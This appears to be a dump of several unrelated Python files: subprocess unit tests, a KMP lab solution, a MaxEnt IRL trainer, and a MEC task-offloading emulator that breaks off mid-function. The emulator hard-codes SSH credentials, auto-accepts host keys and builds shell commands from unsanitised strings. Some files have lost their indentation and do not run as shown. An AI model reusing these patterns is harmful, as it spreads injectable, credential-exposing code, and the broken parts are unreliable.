        # Save the real value instead of assuming it was True, so tearDown
        # restores whatever this platform actually had (the old code
        # hard-coded True, clobbering the saved state on odd platforms).
        self._saved_has_poll = subprocess._has_poll
        subprocess._has_poll = False
        ProcessTestCase.setUp(self)

    def tearDown(self):
        subprocess._has_poll = self._saved_has_poll
        ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
# Tests for subprocess-internal helpers (Python 2 private API:
# _eintr_retry_call was removed in Python 3.5 with PEP 475).
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
# Record every invocation; fail with EINTR exactly on the second
# call to prove the helper retries.
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces (BaseTestCase):
# Check that argv with embedded spaces survives the Windows command-line
# round trip, with and without the shell.
def setUp(self):
super(CommandsWithSpaces, self).setUp()
# The temp script name deliberately contains a space ("te st...py").
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super(CommandsWithSpaces, self).tearDown()
def with_spaces(self, *args, **kwargs):
# Run the script and verify it saw exactly two argv entries:
# its own (spacey) path and the literal "ab cd".
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
def test_main():
    """Run every TestCase in this module, then reap leftover children."""
    test_support.run_unittest(ProcessTestCase,
                              POSIXProcessTestCase,
                              Win32ProcessTestCase,
                              ProcessTestCaseNoPoll,
                              HelperFunctionTests,
                              CommandsWithSpaces)
    test_support.reap_children()


if __name__ == "__main__":
    test_main()
|
lab13_b.py | from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main():  # Knuth_Morris_Pratt
    """Read a pattern and a text from search2.in and write the match count
    plus all 1-based match positions to search2.out (KMP via the prefix
    function of pattern + "$" + text)."""
    file_input, file_output = open("search2.in", 'r'), open("search2.out", 'w')

    def get_prefix(string: str) -> list:
        # prefix[i] = length of the longest proper border of string[:i+1].
        prefix = [0] * len(string)
        for i in range(1, len(string)):
            k = prefix[i - 1]
            while k > 0 and string[i] != string[k]:
                k = prefix[k - 1]
            if string[i] == string[k]:
                k += 1
            prefix[i] = k
        return prefix

    pattern, text = file_input.readline().strip(), file_input.readline().strip()
    m, n = len(pattern), len(text)
    prefix = get_prefix(pattern + "$" + text)
    # prefix[i] == m marks an occurrence ending at concat index i;
    # i - 2*m + 1 converts that to a 1-based start position in the text.
    found_indexes = [i - m * 2 + 1
                     for i in range(m, m + n + 1)
                     if prefix[i] == m]
    print(len(found_indexes), file=file_output)
    print(*found_indexes, file=file_output)
    file_output.close()
# Run main() on a worker thread so the enlarged stack size configured via
# threading.stack_size() above applies (the main thread's stack cannot be
# resized from Python).
thread = threading.Thread(target=main)
thread.start()
train.py | # -*- coding: utf-8 -*-
##############################################################
# train.py
# Copyright (C) 2018 Tsubasa Hirakawa. All rights reserved.
##############################################################
import os
import time
import math
import numpy as np
import multiprocessing as mp
from MaxEntIRL import MaxEntIRL
from util import chunk_list, read_text
# Input data locations (trajectory basenames, tracked trajectories, the 3-D
# feature map and the reference image) plus output/cache directories.
BASE_FILE = "./data/basename.txt"
TRAJECTORY_PATH = "./data/tracking"
FEATURE_MAP_FILE = "./data/feature_map/feature_map_3d.npy"
IMAGE_FILE = "./data/image/image2.png"
RESULT_DIR = "./RESULT"
CACHE_DIR = "./CACHE"
class Trainer:
def __init__(self, input_basename_list):
self.FLOAT_MAX = 1e30
self.FLOAT_MIN = 1e-30
self.n_cpu = mp.cpu_count()
self.basename_list = input_basename_list
self.split_base_list = chunk_list(self.basename_list, (len(self.basename_list) / self.n_cpu) + 1)
self.n_feature = np.load(FEATURE_MAP_FILE).shape[0]
self.n_data = len(input_basename_list)
self.w = np.ones(self.n_feature, dtype=np.float32) * 0.5
self.w_best = []
# empirical feature count
self.f_empirical = np.zeros(self.n_feature, dtype=np.float32)
self.f_expected = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient_best = []
self.loglikelihood = 0.0
self.min_loglikelihood = -self.FLOAT_MAX
self.lam = 0.01
self.DELTA = 0.01
self.converged = False
self.pid = os.getpid()
# compute empirical feature count
for bname in self.basename_list:
tmp_model = MaxEntIRL()
tmp_model.load_trajectory(os.path.join(TRAJECTORY_PATH, bname + ".npy"))
tmp_model.update_weight(self.w)
tmp_model.load_features(FEATURE_MAP_FILE)
tmp_model.load_image(IMAGE_FILE)
self.f_empirical += tmp_model.compute_empirical_feature_count()
self.f_empirical /= self.n_feature
print("empirical feature count:", self.f_empirical)
# make cache directory
if not os.path.exists(CACHE_DIR):
os.mkdir(CACHE_DIR)
def backward_forward_pass(self):
thread = []
for th_i, b_list in enumerate(self.split_base_list):
thread.append(mp.Process(target=self.back_forward_single_thread, args=(b_list, self.w, th_i)))
for t in thread:
t.start()
for t in thread:
t.join()
self.loglikelihood = 0.0
self.f_expected *= 0.0
for th_i, t in enumerate(thread):
ll_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, th_i)))
f_exp_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, th_i)))
self.loglikelihood += np.sum(ll_tmp)
self.f_expected += np.sum(f_exp_tmp, axis=0)
self.loglikelihood /= float(self.n_data)
self.f_expected /= float(self.n_data)
def back_forward_single_thread(self, basename, weight, thread_index):
loglikelihood_tmp = []
f_expected_list = []
for bn in basename:
print(bn)
_start = time.time()
model = MaxEntIRL()
model.load_trajectory(os.path.join(TRAJECTORY_PATH, bn + ".npy"))
model.update_weight(weight)
model.load_features(FEATURE_MAP_FILE)
model.load_image(IMAGE_FILE)
model.compute_reward()
model.compute_soft_value_function()
model.compute_policy()
model.compute_forecast_distribution()
loglikelihood_tmp.append(model.compute_trajectory_likelihood())
f_expected_list.append(model.accumulate_expected_feature_count())
_end = time.time()
print("done. time", _end - _start)
# save
np.save(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, thread_index)), np.array(loglikelihood_tmp))
np.save(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, thread_index)), np.array(f_expected_list))
    def gradient_update(self):
        """One exponentiated-gradient step on the weight vector self.w.

        Compares the current log-likelihood with the best seen so far:
          improvement < 0: halve the step size self.lam and retry from w_best;
          improvement > 0: keep w as the new best, double the step size and
              recompute the gradient (empirical - expected feature counts);
          |improvement| < DELTA: treat as zero and declare convergence.
        """
        improvement = self.loglikelihood - self.min_loglikelihood
        if improvement > self.DELTA:
            self.min_loglikelihood = self.loglikelihood
        elif -self.DELTA < improvement < self.DELTA:
            improvement = 0  # within tolerance -> convergence
        print("improved by", improvement)
        # update parameters
        if improvement < 0:
            print("NO IMPROVEMENT: decrease step size and redo")
            self.lam = self.lam * 0.5
            # re-apply the previous gradient from w_best with the smaller step
            for f in range(self.n_feature):
                self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
        elif improvement > 0:
            print("IMPROVEMENT: increase step size")
            self.w_best = self.w.copy()
            self.lam = self.lam * 2.0
            for f in range(self.n_feature):
                self.f_gradient[f] = self.f_empirical[f] - self.f_expected[f]
            for f in range(self.n_feature):
                self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
        elif improvement == 0:
            print("CONVERGED")
            self.converged = True
        print("lambda:", self.lam)
        print("f_empirical:", self.f_empirical)
        print("f_expected:", self.f_expected)
    def save_parameter(self, output_filename):
        """Write the current weight vector self.w to *output_filename* as text."""
        np.savetxt(output_filename, self.w)
if __name__ == '__main__':
    # Train MaxEnt IRL weights until convergence, checkpointing every iteration.
    if not os.path.exists(RESULT_DIR):
        os.mkdir(RESULT_DIR)
    basename_list = read_text(BASE_FILE)
    trainer = Trainer(basename_list)
    iteration = 0
    while not trainer.converged:
        start = time.time()
        trainer.backward_forward_pass()
        trainer.gradient_update()
        # checkpoint this iteration's weights
        trainer.save_parameter(os.path.join(RESULT_DIR, "weight-%03d.txt" % iteration))
        iteration += 1
        end = time.time()
        print("time of this iteration:", end - start, "s")
    # final converged weights
    trainer.save_parameter(os.path.join(RESULT_DIR, "weight.txt"))
    print("train: done.")
|
12_edf_wound_wait_gui.py | from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import paramiko
import ast
import time
import os
import getpass as gp
import psutil
from drawnow import *
from matplotlib import pyplot as plt
import data
# --- module state: peer registry, multicast socket, task/resource tables ---
hosts = {}  # {hostname: ip}
# multicast group/port used for MEC discovery and wait-time broadcasts
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# static task set: worst-case execution time, period and deadline per task
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
          't2': {'wcet': 1, 'period': 5, 'deadline': 4},
          't3': {'wcet': 2, 'period': 10, 'deadline': 8},
          't4': {'wcet': 1, 'period': 10, 'deadline': 9},
          't5': {'wcet': 3, 'period': 15, 'deadline': 12}
          }
# mat = {'p0': ['cpu', 'mem', 'storage']}
# remaining resource need per task (cpu, mem, storage)
_need = {
    't1': [7, 4, 3],
    't2': [1, 2, 2],
    't3': [6, 0, 0],
    't4': [0, 1, 1],
    't5': [4, 3, 1]
}
# resources currently allocated per task (cpu, mem, storage)
allocation = {
    't1': [0, 1, 0],
    't2': [2, 0, 0],
    't3': [3, 0, 2],
    't4': [2, 1, 1],
    't5': [0, 0, 2]
}
mec_waiting_time = {}  # {ip : [moving (waiting time + rtt)]}
offload_register = {}  # {task: host_ip}
mec_rtt = {}  # {ip: [RTT]}
prev_t = 0  # variable for cpu util
_cpu = []  # cpu plot list
_off_mec = 0  # used to keep a count of tasks offloaded to mec
_off_cloud = 0  # used to keep a count of tasks offloaded to cloud
_loc = 0  # used to keep a count of tasks executed locally
_pos = 0  # tracks position of tasks and time
# 2x2 live dashboard: pie (ax1), wait time (ax2), RTT (ax3), CPU (ax4)
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
def _mov_avg(a1):
    """Return the running (cumulative) average of the sequence *a1*.

    Element n of the result is the mean of a1[:n+1], computed with the
    incremental formula mu_n = ((n-1)*mu_(n-1) + x_n) / n.
    """
    averages = []
    running = 0
    for n, sample in enumerate(a1, start=1):
        running = ((n - 1) * running + sample) / n
        averages.append(running)
    return averages
def plot_offloaded_remote():
    """Pie chart (ax1) of where tasks ran: MEC vs cloud vs locally."""
    keys = ['MEC', 'Cloud', 'Local']
    val = [_off_mec, _off_cloud, _loc]
    cols = ['r', 'g', 'b']
    explode = []
    # pop out the largest slice for emphasis
    for i in val:
        if i == max(val):
            explode.append(0.1)
        else:
            explode.append(0)
    ax1.pie(val, labels=keys, autopct='%.3f%%', shadow=True, explode=explode, colors=cols)
    ax1.set_title('Remote vs Local Frequency')
    plt.subplot(ax1)
def plot_wait_time():
    """Plot (ax2) the moving (wait time + RTT) per cooperating MEC."""
    ax2.grid(True, color='k')
    for i in mec_waiting_time:
        ax2.plot(_mov_avg(mec_waiting_time[i]), linewidth=5, label=i)
    ax2.set_title('Waiting Time Queue')
    ax2.set_ylabel('Moving Wait + RTT')
    # ax2.set_xlabel('Time (seconds)')
    ax2.legend()
    plt.subplot(ax2)
def get_mec_rtts():
    """Ping every known peer MEC once and record the RTT sample."""
    for host, samples in mec_rtt.items():
        samples.append(get_rtt(host))
def plot_rtts():
    """Refresh RTT samples and plot (ax3) the moving RTT per MEC."""
    get_mec_rtts()
    ax3.grid(True, color='k')
    for i in mec_rtt:
        ax3.plot(_mov_avg(mec_rtt[i]), linewidth=5, label=i)
    ax3.set_title('RTT Utilization over Time')
    ax3.set_ylabel('Moving RTT')
    ax3.set_xlabel('Time (seconds)')
    ax3.legend()
    plt.subplot(ax3)
def plot_cpu():
    """Sample the CPU-utilization delta and plot (ax4) its moving average."""
    global prev_t
    # get cpu
    next_t = psutil.cpu_percent(percpu=False)
    # plot the absolute change between consecutive samples, not the raw value
    delta = abs(prev_t - next_t)
    prev_t = next_t
    _cpu.append(delta)
    # plot graph
    ax4.grid(True, color='k')
    ax4.plot(_mov_avg(_cpu), linewidth=5, label='CPU')
    ax4.set_title('Moving CPU Utilization')
    ax4.set_ylabel('Moving CPU')
    ax4.set_xlabel('Time (seconds)')
    ax4.fill_between(list(range(len(_mov_avg(_cpu)))), _mov_avg(_cpu), 0)
    ax4.legend()
    plt.subplot(ax4)
def plot_graphs():
    """Redraw all four dashboard panels and the shared figure title."""
    plot_offloaded_remote()
    plot_wait_time()
    plot_rtts()
    plot_cpu()
    fig.suptitle('MEC Performance During Deadlock Experiment')
def show_graphs():
    """Refresh the live figure via drawnow."""
    drawnow(plot_graphs)
def ip_address():
    """Return this machine's outbound IPv4 address.

    "Connects" a UDP socket to a public address (no packets are actually sent
    for a UDP connect) and reads the local address the OS selected for the
    route.  Fix: the socket is now closed instead of being leaked.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
    finally:
        s.close()
def get_rtt(host):
    """Return the round-trip time to *host* as measured by ping_code.verbose_ping."""
    rtt = pc.verbose_ping(host)
    return rtt
def gcd(a, b):
    """Greatest common divisor of a and b (iterative Euclidean algorithm)."""
    while b:
        a, b = b, a % b
    return a
def _lcm(a, b):
    """Least common multiple of two integers (helper for lcm)."""
    product = a * b
    return int(product / gcd(a, b))
def lcm(_list):
    """Return the least common multiple of every value in non-empty *_list*."""
    return reduce(_lcm, _list)
def gosh_dist(_range):
    """Pseudo-random integer in [0, _range) derived from two randrange draws."""
    base = 23 ** r.randrange(1, 1331)
    modulus = r.randrange(1, 1777)
    return (base % modulus) % _range
def get_edf():
    """Fetch the next task set from data.task, init timing data, and run EDF.

    Returns edf()'s result: the offloaded-task list plus the local schedule.
    """
    global tasks
    global _pos
    tasks = data.task[_pos]
    _pos += 1
    '''
    tasks = {}
    while len(tasks) < 3:
        a = list(_tasks.keys())[gosh_dist(5)]
        tasks[a] = _tasks[a]
    '''
    print('Running RMS on Tasks: ', tasks, '\n')
    waiting_time_init()
    return edf()
def waiting_time_init():
    """Build t_time = {task: [execution_time, latency]} for the current task set.

    Execution time is drawn uniformly from [0.4, 0.8]; latency is period/wcet.
    Tasks offloaded to this MEC by peers are merged in via check_mec_offload().
    """
    global t_time
    t_time = {i: [round(r.uniform(0.4, 0.8), 3), round((tasks[i]['period']) / (tasks[i]['wcet']), 3)] for i in
              tasks}  # t_time = {'ti': [execution_time, latency], ..}
    t_time = {**t_time, **check_mec_offload()}
    print('[Execution_time, Latency]: ', t_time)
def edf():
    """Earliest-Deadline-First schedule of the current tasks over one hyperperiod.

    Releases every job instance up to the LCM of the periods, sorts by absolute
    deadline, simulates execution, and hands deadline-missing jobs to
    cooperative_mec().  Returns offloaded + schedule (lists of task names).
    """
    t_lcm = lcm([tasks[i]['period'] for i in tasks])
    t_dead = {i: tasks[i]['deadline'] for i in tasks}
    sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
    # print(sorted_dead)
    ready_task = []
    # release one job per period instance, tagged with its absolute deadline
    for i in sorted_dead:
        period = tasks[i[0]]['period']
        # print('lcm: ', t_lcm, ' period: ', period)
        t_range = int(t_lcm/period)
        last_dead = 0
        for j in range(t_range):
            ready_task.append((i[0], last_dead+tasks[i[0]]['deadline']))
            last_dead += period
    ready_task = sorted(ready_task, key=lambda t: t[1])
    print(ready_task)
    t_time_ = 0
    schedule = []
    missed = []
    register = {i: 0 for i in tasks.keys()}  # {ti : amount executed}
    for i in ready_task:
        # idle forward while this task's current period instance already ran
        if (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
            while (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
                t_time_ += 1
                # schedule.append(('idle', t_time))
        if (t_time_//tasks[i[0]]['period'])+1 > register[i[0]]:
            # schedule only if the job can finish before its absolute deadline
            if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
                register[i[0]] += 1
                t_time_ += tasks[i[0]]['wcet']
                schedule.append(i[0])
            else:
                print('Deadline missed: ', i)
                missed.append(i[0])
    print('s : ', schedule)
    print('r: ', register)
    if len(missed) > 0:
        print('missed deadline: ', missed)
        cooperative_mec(missed, 0)
    return offloaded + schedule
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
    """Build a deadlock-free execution order for *processes* (wound-wait style).

    A process joins the sequence when its need fits the available resources;
    otherwise the unfinished process holding the largest allocation (or the
    blocked process itself) is preempted and offloaded via cooperative_mec().
    Returns the local execution sequence.
    """
    offload = []
    # To store execution sequence
    exec_seq = []
    # Make a copy of available resources
    work = [0] * len(processes)
    # While all processes are not finished
    # or system is not in safe state.
    while 0 in work:
        ind = work.index(0)
        i = processes[ind]
        # print('comparing| process: ', i, n_need[i], 'work: ', avail)
        if not (False in list(np.greater_equal(avail, n_need[i]))):
            exec_seq.append(i)
            avail = np.add(avail, allocat[i])
            work[ind] = 1
        else:
            # candidates: processes neither finished nor already offloaded
            a = list(set(processes) - set(exec_seq) - set(offload))
            n = {}
            for j in a:
                n[j] = sum(allocat[j])
            _max = max(n, key=n.get)
            # print('work: ', work, 'need: ', n_need[_max])
            # if preempting the biggest holder frees enough for i, wound it;
            # otherwise offload i itself
            if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
                offload.append(_max)
                avail = np.array(avail) + np.array(allocat[_max])
                work[processes.index(_max)] = 1
            else:
                offload.append(i)
                avail = np.array(avail) + np.array(allocat[i])
                work[processes.index(i)] = 1
    if len(offload) > 0:
        print('offloading tasks: ', offload)
        cooperative_mec(offload, 0)
    print('Execution seq: ', exec_seq)
    return exec_seq
def get_exec_seq(pro):
    """Tag each scheduled task with a unique index and run wound_wait on them."""
    global P
    global R
    # Number of processes
    P = len(pro)
    # Number of resources
    R = 3
    # unique ids: repeated 't1' becomes 't1_0', 't1_3', ... (index in schedule)
    processes = ['{}_{}'.format(pro[i], i) for i in range(P)]
    # Available instances of resources
    avail = [7, 5, 5]
    n_need = {i: _need[i[:2]] for i in processes}
    # print('need', n_need)
    # Resources allocated to processes
    allot = {i: allocation[i[:2]] for i in processes}
    # return execution sequence
    return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
    """Compute the cumulative local finish time for each task in *list_seq*.

    Broadcasts the total queue wait (finish time of the last task) to the
    cooperating MECs.  Returns {unique_task_id: finish_time}.
    """
    pre = 0
    time_dic = {}
    for i in list_seq:
        j = '_'.join(i.split('_')[:-1])  # i = 't5_3_3', j = 't5_3'
        time_dic[i] = round(t_time[j][0] + pre, 3)
        pre += t_time[j][0]
    # total wait time = finish time of the last queued task
    w_send = time_dic[list(time_dic.keys())[-1]]
    send_message(str(w_send))  # Broadcasting waiting time to cooperative MECs
    return time_dic
def compare_local_mec(list_seq):
    """Split scheduled tasks into (execute_mec, execute_locally).

    A task is kept local when its latency budget (t_time[...][1]) exceeds its
    projected local finish time from *list_seq*; otherwise it goes to an MEC.
    """
    time_compare_dict = {}
    for task, finish in list_seq.items():
        base = '_'.join(task.split('_')[:-1])
        time_compare_dict[task] = t_time[base][1] > finish
    print('local vs MEC comparison: ', time_compare_dict)
    execute_locally = [t for t, is_local in time_compare_dict.items() if is_local]
    execute_mec = [t for t, is_local in time_compare_dict.items() if not is_local]
    return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
    """Fold one new sample *a1* into the running average tracked for MEC *ma1*.

    *ma1* is an ip keying mec_waiting_time; returns the updated average
    without storing it (the caller appends it).
    """
    if ma1 in mec_waiting_time:
        history = mec_waiting_time[ma1]
        count = len(history)
        current = history[-1]
    else:
        count = 0
        current = 0
    count += 1
    # mu_n = ((n-1)*mu_(n-1) + x_n) / n
    return ((count - 1) * current + a1) / count
def send_message(mg):
    """Multicast *mg* to the MEC group; 'hello' is suffixed with our hostname."""
    _multicast_group = ('224.3.29.71', 10000)
    try:
        # Send data to the multicast group
        if mg == 'hello':
            smg = mg + ' ' + message()
            sock.sendto(str.encode(smg), _multicast_group)
            print('\nHello message sent')
        else:
            sock.sendto(str.encode(mg), _multicast_group)
    except Exception as e:
        # best-effort broadcast: log and continue
        print(e)
def message():
    """Return this host's name read from /etc/hostname (trailing newline stripped)."""
    # NOTE(review): list arg with shell=True means only the first element is the
    # shell command line; works on Linux, but confirm if ever run elsewhere.
    cmd = ['cat /etc/hostname']
    hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
    return hostname
def receive_message():
    """Daemon loop: consume multicast datagrams from peer MECs.

    'hello <name>' registers a peer (and an RTT series for it); any other
    payload not starting with 'update' from a peer is its broadcast wait time,
    folded into mec_waiting_time as a moving (wait + RTT) average.
    """
    while True:
        data, address = sock.recvfrom(1024)
        if data.decode()[:5] == 'hello':
            hosts[data.decode()[6:]] = address[0]
            if address[0] != host_ip:
                mec_rtt[address[0]] = []
        elif (data.decode()[:6] != 'update') and (address[0] != host_ip):
            w_time = calculate_mov_avg(address[0], float(data.decode()) + get_rtt(address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
            if address[0] in mec_waiting_time:
                mec_waiting_time[address[0]].append(w_time)
            else:
                mec_waiting_time[address[0]] = [w_time]
def mec_comparison():
    """Return the ip of the MEC with the smallest latest wait time, or 0 if none known."""
    if not mec_waiting_time:
        return 0
    latest = {ip: samples[-1] for ip, samples in mec_waiting_time.items()}
    return min(latest, key=latest.get)
def mec_task_unicast(task, host_):
    """SSH into *host_* and append (our ip, task, timing) to its task-share file."""
    try:
        c = paramiko.SSHClient()
        un = 'mec'
        pw = 'password'
        port = 22
        c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        c.connect(host_, port, un, pw)
        cmd = ('echo "{} {} {}" >> /home/mec/deadlock_project/temp/task_share.txt'.format(host_ip, task, t_time[task[:2]]))  # task share : host ip task
        stdin, stdout, stderr = c.exec_command(cmd)
    except Exception as e:
        # best-effort delivery: log the ssh failure and continue
        print(e)
def cooperative_mec(mec_list, n):
    """Offload each task in *mec_list* to the best cooperating MEC or the cloud.

    A task goes to the minimum-wait MEC only when that MEC's latest wait time
    is below the task's latency budget; otherwise (or when no MEC is known
    yet) it is sent to the cloud.  Updates the _off_mec/_off_cloud counters.

    Fix: the original duplicated an identical branch body for `n == 0` and for
    every other n; the duplication is collapsed here (behavior unchanged, the
    `n` parameter is kept for interface compatibility).
    """
    global _off_cloud
    global _off_mec
    for i in mec_list:
        _host = mec_comparison()
        if _host == 0:
            # no cooperating MEC known yet -> cloud
            mec_task_unicast(i, cloud_ip)
            print('\n=========SENDING {} TO CLOUD==========='.format(i))
            _off_cloud += 1
        else:
            j = '_'.join(i.split('_')[:-1])
            if mec_waiting_time[_host][-1] < t_time[j][1]:  # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
                mec_task_unicast(i, _host)  # SENDS TASK TO MEC FOR EXECUTION
                mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0])  # adds a new average waiting time
                print('\n======SENDING {} TO MEC {}========='.format(i, _host))
                _off_mec += 1
            else:
                mec_task_unicast(i, cloud_ip)
                print('\n=========SENDING {} TO CLOUD==========='.format(i))
                _off_cloud += 1
def check_mec_offload():
    """Collect tasks that peer MECs have offloaded to this host.

    Reads (then deletes) the shared task file; records each task's origin ip
    in offload_register and returns {task_id: [execution_time, latency]}.
    """
    global offloaded
    offloaded = []
    t_mec = {}  # {t1: [execution, latency}
    try:
        fr = open('/home/mec/deadlock_project/temp/task_share.txt', 'r')
        t = fr.readlines()
        for i in t:
            # line format: "<origin_ip> <task> <[exec, latency]>"
            ta = i[:-1].split()[1][:2] + '_' + str(t.index(i))
            offloaded.append(ta)
            offload_register[ta] = i[:-1].split()[0]
            t_mec[ta] = ast.literal_eval(''.join(i[:-1].split()[2:]))
        fr.close()
        os.system('rm /home/mec/deadlock_project/temp/task_share.txt')
        print('Tasks Offloaded to MEC: {}'.format(offloaded))
    except Exception as e:
        # best-effort: a missing file simply means no peer offloaded anything
        print('no offloaded Task!')
    return t_mec
def execute(local):
    """Simulate local execution (sleep per task); return tasks to report back.

    Tasks whose base id is longer than two characters were offloaded here by a
    peer MEC and must be acknowledged via send_back_task().
    """
    print('\nExecuting :', local)
    send = []
    for i in local:
        j = '_'.join(i.split('_')[:-1])
        time.sleep(t_time[j][0])
        print('#' *((local.index(i) + 1) * 3), ' Executed: ', i)
        if len(j) > 2:
            send.append(j)
    print('============== EXECUTION DONE ===============')
    return send
def send_back_task(l_list):
    """Notify each task's origin MEC (ssh append) that it finished executing here."""
    _host_ip = ip_address()
    for i in l_list:
        try:
            c = paramiko.SSHClient()
            un = 'mec'
            pw = 'password'
            port = 22
            c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            c.connect(offload_register[i], port, un, pw)
            cmd = ('echo "{} {}" >> /home/mec/deadlock_project/temp/executed.txt'.format(i, _host_ip))  # task share : host ip task
            stdin, stdout, stderr = c.exec_command(cmd)
        except Exception as e:
            # best-effort notification: log and continue with the next task
            print(e)
def receive_executed_task():
    """Read (then delete) completion notices for tasks this MEC offloaded to peers."""
    try:
        fr = open('/home/mec/deadlock_project/temp/executed.txt', 'r')
        t = fr.readlines()
        for i in t:
            i = i[:-1].split()
            print('Received Executed task {} from {}'.format(i[0], i[1]))
        fr.close()
        os.system('rm /home/mec/deadlock_project/temp/executed.txt')
    except Exception as e:
        # best-effort: a missing file means nothing was executed remotely yet
        print('No Executed Tasks from MEC Received')
def run_me():
    """Discover the other MECs, then hand over to the main scheduling loop."""
    initialization()
    while True:
        # wait until every expected MEC (including ourselves) has said hello
        if len(hosts) == mec_no:
            print('MEC Details: ', hosts)
            del hosts[message()]  # drop ourselves from the peer table
            break
        time.sleep(2)
    start_loop()
def start_loop():
    """Main experiment loop: schedule, offload, execute and plot for 500 rounds.

    Typing 'exit' at the prompt appends the collected metrics to data.py as
    python literals and terminates.
    """
    global _loc
    print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
    while True:
        x = gp.getpass('Press any key to Start...').lower()
        if x != 'exit':
            for i in range(500):
                edf_list = get_edf()
                print('RMS List of Processes: ', edf_list, '\n')
                print('\nRunning Bankers Algorithm')
                list_seq = get_exec_seq(edf_list)
                if len(list_seq) > 0:  # do only when there is a task in safe sequence
                    wait_list = calc_wait_time(list_seq)
                    print('\nWaiting Time List: ', wait_list)
                    compare_result = compare_local_mec(wait_list)
                    print('\nExecute Locally: ', compare_result[1])
                    _loc += len(compare_result[1])
                    print('\nExecute in MEC: ', compare_result[0])
                    print('\nSending to cooperative platform')
                    if len(compare_result[0]) > 0:
                        cooperative_mec(compare_result[0], 1)
                    local_ = execute(compare_result[1])
                    if len(local_) > 0:  # do only when there is a task to send back
                        send_back_task(local_)
                    receive_executed_task()
                    show_graphs()  # shows graph plots
                time.sleep(3)
            print('\nEnter "Exit" to stop Programme!')
        if x == 'exit':
            print('\nProgramme Terminated')
            # persist the collected metrics as python assignments in data.py
            cmd = 'echo "wt_11_{} = {} \nrtt_11_{} = {} \ncpu_11_{} = {} ' \
                  '\noff_mec11_{} = {}' \
                  '\noff_cloud11_{} = {} \nloc11_{} = {}" >> data.py'.format(mec_no,
                                                                             mec_waiting_time,
                                                                             mec_no,
                                                                             mec_rtt,
                                                                             mec_no,
                                                                             _cpu,
                                                                             mec_no,
                                                                             _off_mec,
                                                                             mec_no,
                                                                             _off_cloud,
                                                                             mec_no,
                                                                             _loc
                                                                             )
            os.system(cmd)
            break
def initialization():
    """Prompt for experiment parameters and start the multicast listener thread."""
    global mec_no
    global host_ip
    global cloud_ip
    host_ip = ip_address()
    try:
        mec_no = int(input('Number of MECs: ').strip())
        cloud_ip = input('Cloud Server IP: ').strip()
        print('\nCompiling MEC Details')
        # listen for peer hello/wait-time broadcasts in the background
        h1 = Thread(target=receive_message)
        h1.start()
        while True:
            b = input('Send Hello Message (Y/N): ').strip().lower()
            if b == 'y':
